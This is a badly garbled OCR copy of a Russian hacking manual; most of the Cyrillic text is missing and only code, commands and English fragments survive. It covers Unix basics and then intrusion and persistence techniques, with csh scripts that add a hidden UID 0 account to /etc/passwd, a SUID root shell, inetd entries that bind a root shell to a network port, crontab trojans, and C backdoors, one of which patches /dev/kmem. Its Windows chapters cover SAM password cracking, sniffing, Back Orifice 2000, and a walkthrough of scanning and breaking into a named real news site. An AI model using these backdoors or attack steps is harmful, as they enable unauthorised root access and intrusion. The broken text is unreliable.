, ,

, :

From optik! sirhacksys! att. com! s d ! sbell! pacbell! unisys! sys!sirhack

mail username, username - .

control-D.

mail. To : $ mail : scythian : sirhack : W e l l . . . . , ! ? .

mail .

- . :

d -

f username - username

wfname - fname

Unix 93

s fname - fname

q - / mail

- ,

m username - username

-

4 [enter] - + -

-

h - .

. ,

.

- ,

,

- .

UUCP. UUCP - UUCP, .

ps . ,

.

(PID), , -

. ps . , sirhack, csh, watch scythian. watch , - ,

:

$ ps .PID TTY NAME 122 001 ksh 123 001 watch $ PS, .

TTY tty ( /),

94 Unix

process. , (!) . ps -f , watch , , watch scythian.

kill . ,

.

, (, ), EUID , , . ( EUID ). , . ,

- , - ..

, kill 122, . kill UNIX . kill pid, UNIX , , . ,

! kill -numpid (num - ). Kill -9 pid - . $ k i l l 122 $ k i l l 123 $ ps PID TTY NAME 122 001 ksh 123 001 watch $ kill -9 123 [123]-.killed $ kill -9 122 garbage NO CARRIER

kill -1 0, . .

7.

-

, sh, ksh, csh . .bat MS-DOS, . .

Unix 95

. , ,

- , .

number=1 number 1. string=Hi There

string="Hi There" string Hi

there.

- .

,

($). . ,

bat-, . , . :

counter=1 arg1="-uf" arg2="scythian" ps $arg1 $arg2 echo $counter ps -uf scythian,

1. Echo , .

:

read - .

: read . ! - , :

echo " ?" read hisname echo Hello $hisname ? Sir Hackalot Sir Hackalot : read .

96 Unix

trap - (Ctrl-c). :

trap command; command; command; .. :

trap "echo '!! ' ; echo ! ' , control-c ,

:

!! !

exit : exit []. ,

, .

CASE case .

:

case in 1) command; command;; 2) command; command; command;; *) command;; esac

.

;;>. :

echo ":" echo "(D) i rectory (L)ogoff ( S ) h e i r read choice case Schoice in D) echo " ..."; i s -al ; ; L) echo ; kil l -1 0;: S) exit;; *) Echo "! ";; esac

Unix 97

esac case.

.

8.

, . : for repeat.

repeat :

repeat 12

. :

repeat s c y t h i a n sirhack prophet

scythian, sirhack, prophet.

for

for -

do ()

done () :

for counter in 1 2 3 do echo $counter done 1, 2, 3.

9. TEST

: Test

::

-eq = () - ( )

4-2588

98 Unix

-gt > () -It < () -ge >= ( )

-1

Unix 99

expr 22+12

22+12 :

expr 22 + 12 :

34

11.

, ,

.profile.

home () .

PS1 , .

$. BSD &.

PATH .

, , ,

. MS-DOS, . ,

,

, ,

, . - ,

.

:

:/bin:/etc:/usr/lbin:$0: , Unix

/bin, /etc, /usr, /lbin , , .

, .

sh sh, , Unix /bin. . -

100 Unix

, , ,

.

TERM .

CURSES, - , esc-. - ,

- .

esc- TERMCAP. , ami vtlOO, CURSES , .

12.

. ? , .

, .

.

..

..

,

, ,

, .

makefile, make , -

.

make , ,

.

:

$ login.& [1234] $ (1234 - , .)

Unix 101

13.

Unix. , Unix,

.

.

,

, MS-DOS , , AmigaDos. ((d) ):

/ ( ) I

I I bin (d) usr (d)

.

sirhack(d) scythian (d) prophet (d) I

src (d) , :

/ /bin /usr /usr/sirhack /usr/sirhack/src /usr/scythian /usr/prophet , .

102 Unix

14.

, - .

. , ,

.

,

. .

( ) id , .

.

, / . , Unix, , UID , .

. .

(owner). , , - .

, , CHOWN, , .

, - ,

, . ,

, chgrp.

. ,

. , ,

, .

, , ,

, , - ,

. ,

, .

. , . - -

.

, .

. - . :

$ Is -1 runme r-xrwxr- sirhack root 10990 March 21 runme root , .

sirhack - . root , ,

. , Scythian, root. ,

Unix 103

. datawiz, .

, , ? . - . ,

,

, , .

,

r-x-rwxr--

(-). (-) ,

.

r-xRWXr-(, ) ,

, .

r-xrwxR-- . ,

.

:

$ I s - 1 drwxr-xr-x sirhack root 342 March 11 src d . ,

(sirhack) , .

, .,

,

:

$ chmod go-r $ is d r W x - x ~ x sirhack root 342 March 11 src -, sirhack,

.

Is, src, , , cannot read directory ( ). - , ,

- .

- ,

.

104 Unix

UNIX

1. !

,

, ,

,

,

...

!

2.

- UNIX. , ID.

ID.

. ? , GANDALF data switch .

.

(8N1 71), GANDALF UNIX. . - ,

, .

, .

,

, . LOG OFF, . , , , ,

. SU () , (, , WHO).

Unix 105

3.

. UNIX .

,

. (, UNIX ) VI.LOGIN.

VI.LOGIN : VI.LOGIN logout , VI.LOGIN

. :

,

.

:

,

.

(ROOT - ).

4.

. ( )

, UNIX. -

. , .

, ,

(, 3-4) . ID , , ,

, - . ,

UNIX, . ! , ! , -

106 Unix

. , -

, , ,

? , ,

,

, , .

, !

PASSWRDS, (SU) !

. UNIX , , .

. .

. , .

, , , NIS, NFS, , SUID, Sendmail . . ! ? #? -!

, ,

root. ? ,

?

5. root

, ,

, .

: . ( , ,

UNIX ). passwrd (

7 , , ..). vi. , UNIX . Vi . -

Unix 107

(dial-up\telnet\rlogin\whatver), , .

,

.

.

, , , ,

, ,

- .

:

,

.

:

(1) UID 0 . ,

, .

, -

.

.

...

#!/bin/csh # Inserts a UID 0 account into the middle of the passwd file. ft There is likely a way to do this in 1/2 a line of AWK or SED. Oh well. # [email protected] set l i n e c o u n t = 'wo -1 /etc/passwd' cd # Do this at home. cp /etc/passwd ./temppass # Safety first. echo passwd file has $ l i n e c o u n t [ 1 ] lines. @ l i n e c o u n t [ 1 ] /= 2 linecount[1] += 1 ft we only want 2 temp files echo Creating two files, $linecount[1] lines each $or approximately that$. split -$linecount[1] . / temppass ft passwd string optional echo EvilUser::0:0:Mr. Sinister:/home/sweet/home:/bin/csh" ,/xaa cat ./xab . /xaa mv ./xaa /etc/passwd

108 Unix

chmod 644 /etc/passwd # or whatever it was beforehand rm ./xa ./temppass echo Done... . , ,

.

(2)

, Sync. , , , , .

UID 0 ( * ).

(3) /tmp: #!/bin/sh # Everyone'sfavorite... cp /bin/csh /tmp/.evilnaughtyshell # Don't name it that... chmod 4755 /tmp/.evilnaughtyshell \tmp .

.

,

SUID. , , ... ,

.

, .

(4)

,

?

: Internet- (\etc\ inetd\) TCP UDP .

\etc\inetd.conf. .

:

( D (2) (3) (4) (5) (6) (7) ftp stream tcp nowait root /usr/etc/ftpd ftpd talk dgram udp wait root /usr/etc/ntalkd ntalkd

(1) - , \etc\services. inetd

Unix 109

\etc\services .

, . TCP stream (- ), UDP - dgrams (, ). - (TCP UDP). . wait ,

, , nowait, ,

. - ( UID), . (6) - , (7) ( ). ( ) . internal (6) (7). , , ,

, SUID, , \etc\passwd .

:

\etc\inted.conf, , , .

:

daytime stream top nowait root internal :

daytime stream tcp nowait /bin/sh sh -i \etc\inetd\

. , .

(kill -9, /usr/sbin/inetd /usr/etc/inetd), ( ).

(5)

,

.

.

,

\etc\services, \etc\inetd.conf.

110 Unix

\etc\services : (1) (2)/(3) (4) smtp 25/tcp mail (1) - , (2) - , (3) - ,

, (4) - . \etc\services: evil 22/tcp evil /etc/inetd.conf: evil stream tcp nowait /bin/sh sh -i inetd. :

.

,

Internet.

(6)-I - .

,

, , crontab . ,

.

crontab /var/spool/cron/crontabs/root. . ,

.

- . ,

, .

crontab - , crontab. crontab , /var/spool/crontab/root.

crontab :

(1) (2) (3) (4) (5) (6) 0 * * 1 /usr/bin/updatedb

1 5 : (0-59), (0-23), (1-31), (1-12), (0-6). 6 - ( ). .

Unix 111

cron /var/spool/crontab/root. , ,

/etc/passwd U1D 0 ( - crontab, ).

/var/spool/crontab/root: 0 * * /usr/bin/trojancode :

f t ! / b i n / c s h ft Is our eviluser still on the system? Let's make sure he is. #[email protected] set evilflag = Cgrep eviluser /etc/passwd') if($#evilflag == 0) then ft Is he there? set linecount = 'wc-1 /etc/passwd' cd # Do this at home. cp /etc/passwd ./temppasstf Safety first. linecount[1] /= 2 linecount[1] += 1 ft we only want 2 temp files split -$linecount[1] ,/temppass ft passwd string optional echo "EvilUser::0:O:Mr, Sinister: /home/sweet/home:/bin/csh" ./xaa cat ./xab./xaa mv ./xaa /etc/passwd chmod 644 /etc/passwd tt or whatever it was beforehand rm ./xa* ,/temppass echo Done... else endif

(7) - II

. , () , etc/passwd. ( /var/spool/mail/.sneaky) . , ,

, 2.30 ( ) \etc\passwd ( !).

112 Unix

,

, ,

.

crontab: 29 2 * * * /bin/usr/sneakysneaky_passwd :

echo ,root:1234567890123:0:0:0perator:/:/bin/csh" > /var/spool/mail/.sneaky :

#!/bin/csh # Install trojan / e t c / p a s s w d file for one minute [email protected] cp /etc/passwd /etc/.temppass cp /var/spool/mail/.sneaky /etc/passwd sleep 60 mv /etc/.temppass /etc/passwd

(8) .

- -, .

.

, .

- .

SUID-- , . -

, ,

.

/* [email protected] */ ((include Sdefine KEYWORD "indust" define BUFFERSIZE 10 int main(argc, argv) int argc; char.argv[] ;{ int i=0; if(argv[1]){ /* we've got an argument, is it the keyword? */ if(!(strcmp(KEYW0RD,argv[1]))){ /* */ systemCcp /bin/csh /bin/. swp12V);

Unix 113

system("chown root / b i n / . s w p i 2 l " ) ; system*"chmod 4755 /bin/.swp121"); } } /* Put your possibly system specif ic t ro jan messages here */ /* Let's look like we're doing s o m e t h i n g . . . */ printfCSychroniz ing bitmap image records."); /* system*"is -alfl / >& /dev/null > /dev/null&"); */ for* ; i tmpf i le /usr/bin/uuencode tmpfile / root/ , rhosts , 25.

, uuencode- .rhosts. () :

%echo "+ +" | /usr/bin/uuencode / r o o t / , rhosts | mail decode@target . com .

, ,

.

.

114 Unix

(10) ,

, tripwire.

:

. su, login pass-wrd, . ,

UNIX. (: ,

, ). , ,

:

,

, ,

.

10- .

(11) : \dev\khem .

, , ,

UID. , , \dev\khem /. : \dev\khem, , U I D , csh, U I D . .

/* \khem , , ID 0. */ include include include include include include include define KEYWORD "nomenclaturel" struct user userpage; long address(), userlocation;

Unix 115

int main(argc, argv, envp) int argc; char *argv[], *envp[];{ int count, fd; long where, lseek(); if(argv[1]){ /* we've got an argument, is it the keyword? */ i f ( ! (strcmp(KEYW0RD,argv[1]))){ fd=(open("/dev/kmem",0 RDWR); if(fd

116 Unix

include include define LNULL ((LDFILE *)0) longaddress(){ LDFILE -object; SYMENT symbol; long idx=0; object=ldopen("/unix",LNULL); if(!object){ fprintf(stderr,"Cannot open /unix.\n"); exit (50); } for(;ldtbread(object,idx,&symbol)==SUCCESS;idx++){ if(!strcmp(" u",ldgetname(object,&symbol)))

{ fprintf(stdout, "Userpage is at 0x%8.8x\n", symbol.n_value); ldclose(object); return(symbol.n_value);

) } fprintf(stderr, "Cannot read symbol table in /unlx.\n"); exit (60); }

(12) /dev/kmem

, , , ,

.

- (7), (, 5 ) , /dev/kmem, .

(7): chmod 666 /dev/kmem sleep 300 Nap for 5 minutes chmod 600 /dev/kmem # Or whatever it was before

Unix 117

6.

:

, ,

. - ,

single-user ( ) .

-

, ,

,

,

.

(, ), . -

sendmail debug, . ,

, passwrd, , , ( , , sendmail, Internet Worm, telnet 25 .

, , , :

a) ,

root/daemon/bin, , ,

.

b) , ,

.

118 Unix

/ / ,

. ,

. ,

AT&T System V Unix acctcom(l),

. TCP/IP / , rwhod, fingerd tftpd, .

.

/ ; ( /etc, /etc/re, /etc/rcX.d) . .

chmod(l).

7. /

.

; .

-

,

.

, , ,

,

.

,

. ,

.

Unix 119

; , .

. , ,

,

.

,

! - ( ) .

8. Unix

:

:

1) . 2) src. 3) . 4) . :,

1) SUID/SGID. 2) / .. 3) . 4) . 5) . 6) . 7) . 8) . 9) . 10) /.

120 Unix

11) . 12) , . 13) .

:

I: Suid-

) . ) . ) (

sym, loc.-). ) . II: , SUID

) . ) . ) . ) . ) . III:

) . ) . ,

System Development Corporation 65%- .

:

1 .

,

.

Unix 121

:

A) : , . : .

B) : , . : i-node ( ).

C) : , . : .

.

.

, .

.

, ,

LINUX, NET2 BSD386. , ,

, ,

. ,

() , - ,

.

2 (

).

UNIX? ( , ).

who OS , .

suid- OS. - suid . : - suid, -

122 Unix

. ,

suid, suid, .

,

, -: , suid, sgid, ( suid/sgid), OS .

. ( ).

4

.

9.

1) , .

: gets, (sprintf()?, gets () ..). strcpy (), src:

define SCYPYN((a)(b)) strcpy(a, b, s izeof(a)) 2) SUID/SGID ,

PERL. 3) SUID/SGID , PERL

taintperl.

4) SUID/SGID , system(), popen(), 1() execvp() .

5) , .

6) .

Unix 123

7) , . (: fork(2),suid(2),setuid() ).

8) , : ) ; ) ; )

;

) , passwd, L.sys ..; )

/;

) , .

9) . , , .

10) man- -

-. .

11) - , .

,

/.

,

OS-. , . , telnet -h ... , login.c:

i f ( ( g e t u i d ( ) ) && t i f lagX syslogO e x i t ( ) }

12) . 13) , ,

, ,

.

124 Unix

14) , .

15) , , , .

16) : ,

.

17) - .

18) : (passwd OK, illegal parameter, segment error ..) , . 17.

19) . 20) ,

.

21) . 22) . 23) ,

-

.

24) , , .

25) , . ( UID 0, .)

26) , ... 27) . 28)

( ).

29) , , , ,

( ).

Unix 125

30) .

, ,

, ,

,

, .

31) , fopen(3) umask. (: 1(1).)

, UID .

32) Trace - ( truss SVR4). , .

33) /usr/local. .

tcpdump, top, nfswatch... suid.

34) suid , , .

, ,

.

35) , .

36) . LD PRELOAD, , .

37) I/O - , . , .

38) , I/O (pre-load ).

39) I/O , ,

.

40) , . , ,

/etc/a, ,

126 Unix

( , /etc/utmp).

41) , suid/sgid.

10.

, ,

. vi ( ). vi :

:set shell = /bin/sh shell, : :sheU

cd, ftp , cd.

Microsoft Windows 2000 127

Microsoft Windows 2000

1.

Windows NT Windows 2000

Windows NT Windows 2000. Windows

NT/2000? Windows NT/2000 ( Windows NT, .. Windows 2000 NT) ,

DOS, Windows ./95/98,

. : , . , , .

,

Windows NT - - . , Windows NT/2000 , . , ,

TCP/IP Windows NT,

(host, nslookup, talk ..). , ,

Windows NT..

, ,

. ,

,

Internets. ,

Windows NT. 10 30% . .

128 Microsoft Windows 2000

? , - .

:

1. ;

2. ;

3. . ,

.

. ,

,

Internet.

.

. , ,

. ,

, . ,

, ,

, ,

- ... .

2.

? , ,

. , ..

, . ,

,

, .. , ( ), .., , - , , . .

.

Windows NT (.. , , ). ( FAT) NTFS


. - Windows NT - FAT NTFS. FAT.

-

ZIP-. , , FAT. . ,

NTFS. .

NTFS , . -

Windows NT. MS-DOS , , NTFS, NTSFDOS.EXE ( - Mark Russinovich, ). Windows NT , , , . , , .

, , - ,

, , - .

, ,

NTSFDOS.EXE , , . ,

- , ,

.

- (), Windows NT ( Windows 2000). Windows NT, . :

SeNTry2020 (http://www.softwinter.com); SecurityPlus (http://www.softbytelabs.com); Ciyptext(http://www.tip.net.au/~njpayne). ,

,

, ,

- -OW (http://www.security.ru), . ,

, .

. ,

, .

5-2588


,

- , - ,

- .

, .

, ( ) .

, .

, ,

/ . SAM, . ,

.

WINNTASYSTEM32\CONFIG\. Windows NT , SAM, WINNT\SYS-TEM32\CONFIG\, , , .

SAM, LOPHTCrack. Rambler.ru AltaVista. .

,

. , , , .

: . , ,

, -

, .

13-16 , Windows NT 128 . , SAM ,

. - Windows NT, - LAN Manager. LAN Manager , ,

, : Windows 3.11 for Workgroups Windows 95/98. , : , LAN Manager , 14- ,

. , 14- 7- , -


. ,

, ,

LAN Manager.

LOphtCrack, Pentium 11-450, , , ( ).

SYSKEY, Service Pack 3. SYSKEY SAM,

. . - ,

, LOphtCrack .

3.

SAM SAM- ,

... , ,

Windows NT/2000 (registry), %SystemRoot%\SYSTEM32\ CONFIG\SAM - . , ..

.

. , -

ERD (Emergency Repair Disk), %SystemRoot%\ REPAIR\. , Administrator Guest, , . 16- , ( UNICODE) - MD4. Windows NT/2000

-.

,

Internet .


4. LOphtCrack

LOphtCrack , .

,

.

SAM. - . .

300 . ,

,

( 100 . ).

word-english File () Open Wordlist File ( ).

A-Z A-Z 0-9 ( ) .

- .

, .

Tools ()


, , ,

.

,

File () Open Password File ( ).

. lOpht-crack.exe ( 10phtcrack95.exe Windows 95/98). ,

Windows NT 4.0 ( Window 2000), sniffer readsmb.exe, Windows 3.11/95/95 MS-DOS. sniffera ND1S-, .

Ethernet- CSMA-CD. NDlS- Network () . Protocols () Add (). Have Disk ( ) , LOphtCrack Oemsetup.inf. sniffer readsmb.exe Windows.

-

.

: , SAM sniffera.

,

, Tools () Dump Password from Registry ( ). IP \\Computer_name \\IP-address.


Windows NT/2000 ,

.

, Windows NT/2000 , Administrator , . ,

,

. nporpaMMyregedit.exe HKEY_CURRENT_USER\Software\ LHI\LOphtCrack\AdminGroupName.

Administrator Windows NT (2000).

SAM SAM

, ERD (Emergency Repair Disk). NT %SystemRoot%\SYS-TEM32\CONFIG\. Windows NT/2000, DOS NTFSDOS (http://www.ntinternals.com/ntfs20r), SAM . LOphtCrack Import SAM File ( SAM--), File (), SAM. Windows NT (2000) , SAM, %SystemRoot%\REPAIR\. , ,

backup ERD, SAM . ERD, *._ :

EXPAND SAM. SAM

sam._ LOphtCrack. Service Pack 3 for

NT 4.0 SYSKEY - , LOphtCrack ( , LOphtCrack 2.5) SAM.


sniffer'a

SYSKEY ,

.

sniffer, Ethernet-.

sniffer, LOphtCrack, readsmb.exe, Windows NT 4.0 ( sniffer Windows 95/98).

sniffer'a : READSMB > PASSWD , ,

sniffer'oM, passwd.

sniffer , , .

passwd LOphtCrack.

sniffer'a -v: READSMB -V

-v , readsmb , - .

,

LOphtCrack, word-eng-lish, . Run () Tools ().

, Tools Options no , ,

word-english. -

, . LOphtCrack 5 *.LC .


LOphtCrack 2.52 450%

Pentium, Pentium MMX, Pentium Pro Pentium II III. .

-

Pentium II/450.

.

.

SMB sniffer'a Windows 95/98.

PWDUMP2,

SAM, SYSKEY SP3.

PWDUMP2 http://www.webspan.net/~tas/pwdump2/

SYSKEY , , ,

Administrators. , ,

.

Windows NT PWL-.

Windows 3.11/95/98, ,

Windows NT . *.PWL , Windows 3.11/95/98. repwl.exe, http://webdon.com /vitas/pwltool.htm.

PWL-, .. Browse () PWL-,

Search Password ( ).


Windows NT. ,

, ,

,

. ,

: http://www.microsoft.com/ntserver/security/exec/overview/ Secure_NTInstall.asp

.

, ,

,

, . ,

-

, ...

GetAdmin.exe ( - - ). , Service Pack 4 , . , , - .

NT , , System Account, , .

. , , Billy , SP4 . : , .

5.

,

Windows NT. , ,

,

Windows NT ( ) .

:

Named Pipe File System.


6. Named Pipe File System

Named Pipe File System , , named pipes. named pipes , , (mail-slots). , ( CreateFile, ReadFile WriteFile), . named pipes , .

( ), ( ). Windows NT :

Win32 CreateNamedPipe.

ConnectNamedPipe, .

Wcomputer name\pipe\pipe name CreateFile.

CloseHandle. DisconnectNa-medPipe.

ConnectNamedPipe.

.

N- , N- CreateNamedPipe ( ).

,

( ) .


ReadFile WriteFile.

WriteFile, , ReadFile.

Named Pipe File System Windows NT ,

. , (RPC) Windows NT NPFS.

Named Pipe File System .

PipeBomb AdminTrap, Named Pipe File System.

7. PipeBomb

PipeBomb

.

, ,

, .

(thread), .

,

.

,

.

.

,

Windows NT 4.0. PipeBomb .

Create () Write (), Windows NT .

140 Microsoft Windows 2 0 0 0

Internet, SMB TCP/IP ( Named Pipe File System SMB).

S. AdminTrap

AdminTrap ,

. AdminTrap Win32 ImpersonateNa-medPipeClient, (access token) , handle . ,

AdminTrap -- .

, AdminTrap Imperso-nateNamedPipeClient , , :

winreg - , ,

(alerts), ,

;

spoolss - .

.

, ,

,

,

AdminTrap, Administrators.

9.

Back Oriffice 2000 Back Orifice ( - )

Windows NT Internet. B02K ,


,

.

Windows 95/98 Windows NT.

2 ( bo2kgui.exe)

TCP UPD 31337.

( 120 ) IP-.

. , ,

:

;

;

;

;

, ;

;

;

.

2 Configuration Wizard ( bo2kcfg.exe). 2 Configuration Wizard 2 (2.) , . , IP-, .

,

IP- TCP UPD. TCP- Internet. UPD- .


,

bo2k.exe , Plugins DLL.

10. Windows NT Internet

Windows NT Internet. - , IP-. Web-, , .

, ,

Web-. Web- HS 3.0/4.0/5.0, Microsoft Windows NT, : Web- *.htm, *.asp; Winl253, KOI8-R ( ) .

,

. ,

ind&cMm, . Internet^ Web- : http://www.ida-honews.com/, . ,

scripts cgi-bin.

scripts cgi-bin , - . ,

Web-. - , , scripts cgi-bin. .

, cgi-bin , Windows NT Perl. ,

. , cgi-bin MSWin32-x86-object. .


, MSWin32-x86-object Perl 5.0, Perl 5.00502.exe. PerlIS-Err.log:

*** -E:\docs' error message at: 1998/11/24 13:23:57 Can't open perl script "E:\does": Permission denied . . . 'E:\docs- error message at: 1998/12/25 04:49:16 Can't open perl script "E:\docs": Permission denied . . . -E:\docs' error message at: 1999/03/26 16:05:43 Can't open perl script "E:\docs": Permission denied . . . 'E:\docs' error message at: 1999/09/08 11:39:54 Can't open perl script "E:\docs": Permission denied -. 'E:\docs' error message at: 1999/09/08 11:58:34 Can't open perl script "E:\


, , ..,

, .

, , , .

Windows:

7th Sphere PortScanv 1.1 All Around Internet Ogre v0.9b Port Scannerv 1.1

PortScan Plus SiteScan by Rhino9/Intercore TCP Port Scanner

UltraScanvl.2. http://208.234..

248.19:81/hack/genar/archive5.html. Ogre v0.9b (Rhino9). Windows UNIX Internet.

Ogre Windows NT Internet.

Ogre

Windows 95 Windows NT, . Ogre :

;

,

,

;

netbios (Nbtstat);

,

(net view);


Microsoft Frontpage;

;

Index Server.

11. Ogre

IP- http://www.idahonews.com/.

ping www.idahonews.com: Pinging www.idahonews.com [198.60.102.4] with 32 bytes of data: Request timed out. Request timed out. Request timed out. Request timed out. IP- DNS, ping

. , firewall'OM .

idahonews.com. ,

, IP Starting IP ( IP-) 198.60.102.1. Ending Octet 254 ( ). Start scan ( ).

:

Scanning - 198.60.102.1

Commencing Port Scan:

Port 21: Closed Port 23: Open Port 25: Closed 'Port 53: Closed Port 79: Open


Port 8 0 : Closed Port 110: Closed Port 1 1 1 : Closed Port 139: Closed Port 443: Closed Port 1080: Closed Port 8181: Closed

Scanning - 198.60.102.2

I n a c t i v e IP address*

Scanning - 198.60.102.3

Inactive IP address*

Scanning - 198.60.102.4

. IP address*

Scanning - 198.60.102.5


Port 21: Closed Port 23: Closed Port 25: Open Port 53: Open Port 79: Open Port 80: Closed Port 110: Open Port 111: Closed Port 139: Closed Port 443: Closed Port 1080: Closed Port 8181: Closed

Scanning - 198.60.102.6

*Inactive IP address*

Scanning - 198.60.102.38


. I n a c t i v e IP address*

Scanning - 1 9 8 . 6 0 . 1 0 2 . 3 9


Port 21: Closed

Port 23: Closed Port 25: Open Port 53: Open Port 79: Open Port 80: Closed Port 110: Open Port 111: Closed) Port 139: Closed Port 443: Closed Port 1080: Closed, Port 8181: Closed Scanning - 1 9 8 . 6 0 . 1 0 2 . 4 0

i n a c t i v e IP address*

Scanning - 1 9 8 . 6 0 . 1 0 2 . 5 4

. I n a c t i v e IP address*

Scanning - 1 9 8 . 6 0 . 1 0 2 . 5 5


Port 2 1 : Closed Port 23: Closed, Port 25: Open Port 53: Open Port 79: Open Port 80: Closed Port 110: Open Port 111: Closed Port 139: Closed Port 443: Closed Port 1080: Closed


Port 8181: Closed Scanning - 198.60.102.56

.Inactive IP address*

Scanning - 198.60.102.254

Inactive IP address* Windows NT

135-139. , .

:

Scanning - 198.60.102.4

.Inactive IP address* , firewaUoM.

, .

tracert 198.60,102.1 ( UNIX trace-route):

Tracing route to cisco.idahonews.com [198.60.102.1]over a maximum of 30 hops: 11 240 ms 241 ms 240msgbr2-p01.wswdc.ip.att.net ,[12.123.8.241] 12 261 ms 260 ms 251 ms gbr1-p40.oc-48., ip.att.net [12.122.2.82] 13 330 ms 301 ms 390 ms gbr2-p50.oc-12.sffca.ip.att.net [12.122.3.17] 14 301 ms 320 ms 311 msar2-a3120s4.sffca.ip.att.net [12.127.1.145] 15 401 ms 350 ms 351 ms 12.126.207.46 16 381 ms 350 ms 371 ms cisco.idahonews.com [198.60.102.1] Trace complete

, -

. ,

198.60.102.1 Firewall Cisco. . , , ,

. cisco.idahonews.com Ogre : 23 (Telnet), 79.

tracert 198.60.102.5: Tracing route to router.idahonews.com [I98.60.l02.5]over a maximum of 30 hops:


12 260 ms 270 ms 261msgbr1-p40.oc-48.sl9mo.ip.att.net [12.122.2.82113 321 ms 310 ms 300 ms gbr2-p50.oc-12.sffca. ip.att.net [12.122.3.17] 14 310 ms 321 ms 320 ms ar2-a300s3.sffca. ip.att .net [12.127.5.177] 15 341 ms 340 ms 371 ms 12.126.207,34 16 371 ms * * 198.60. 104. 181 17 361 ms 361 ms 370 ms router.idahonews.com [198.60.102.5] Trace complete , 198.60.

102.5 router ( UNIX-). router.idahonews.com : 25 (SMNP-), 53 (DNS-cep-), (POP-). , , DNS-. ,

idahonews.com 192.168.0.*.

198.60.102.6-253 , IP- idahonews.com.

,

. www.idahonews.com .

, Firewall'oB Cisco Unix- . ,

Windows NT Firewall'oM 135-139 .

12. Windows NT

, , Internet Windows NT, Firewall'oM, 135-139 . , ,

, firewall, . , ,

, Windows NT Service Pack. IIS, , , ,


, ,

fix'bi, (Binding) Network ().

, Ogre : Scanning - 198.60.102.4

Commencing Port Scan: Port 21: Open

, FTP, IIS.

Port 23: Closed Port 25: Open

, SMNP, IIS Port 53: Open Port 79: Closed Port 80: Open

, HTTP, IIS. Port 110: Open Port 111: Closed Port 139: Open

, File Sharing. Port 443: Closed Port 1080: Closed Port 8181: Closed Surveying Web Server: -Checking for Vulnerable URLs: Frontpage Extensions: Not Present IIS HTML Administration Interface: Present

, IIS. IIS Samples: Present Commencing Nbtstat Scan: NetBIOS Remote Machine Name Table Name Type Status

Registered Registered Registered Registered Registered Registered Registered Registered Registered Registered Registered

MAC Address = XX-XX-XX-XX-XX-XX X, Y Z ,

, firewall'OM.


YYYYY UNIQUE - - YYYYY UNIQUE ZZZZZZZZZ GROUP ZZZZZZZZZ GROUP ZZZZZZZZZ UNIQUE ZZZZZZZZZ GROUP YYYYY UNIQUE .ZZZZZZZZZ UNIQUE I N e f S e r v i c e s GROUP ,.__MSBR0WSE__. GROUP

IS~YYYYY UNIQUE , NetBIOS ,

nbtstat -.... NetBIOS .

UNIQUE , IP-;

4 GROUP , IP-.

, ,

,

Windows NT.

,

FTP.

, ,

Windows NT (Guest, Administrator), . ,

IIS (Internet Information Service), IUSR_


NAT

NetBIOS Auditing Tool, UNIX, Win32.

Nat - , NetBIOS.. .

:

NAT [-0 ] [-U ] [- ]

. , ,

Ogre. LOphtCrack, Passlist.txt. , Ogre. nat:

NAT - REZALT.TXT 198.60.102.4

NAT , .

,

,

.

, NAT 30 50 .

Windows NT 100% . , , , . NAT Administrator,

.

, NAT , Administrator, ,

. , ,

NET USE, 8._ WINNT/REPAIR LOphtCrack, .


, NET USE ( FTP), , ,

(Getadmin ..). Windows NT InetPub/cgi-bin. , , , :

http://www.idahonews/scripts/getadmin.exe?mmmm mmmm ,

.

PWDUMP.EXE ( ) Back Orifice NetBus (http://indigo.ie/ ~lmf/nb.htm), .

154

1.

, -

, .

:

. - .

, UNIX login root . .

(, login&password).

(sniffing), (-).. - ,

.

: WWW- WWW- - JAVA, ActiveX.

WWW- / .

,

.

; ,

155

, ,

, , - .. ,

Documents

Максим Левин Как стать хакером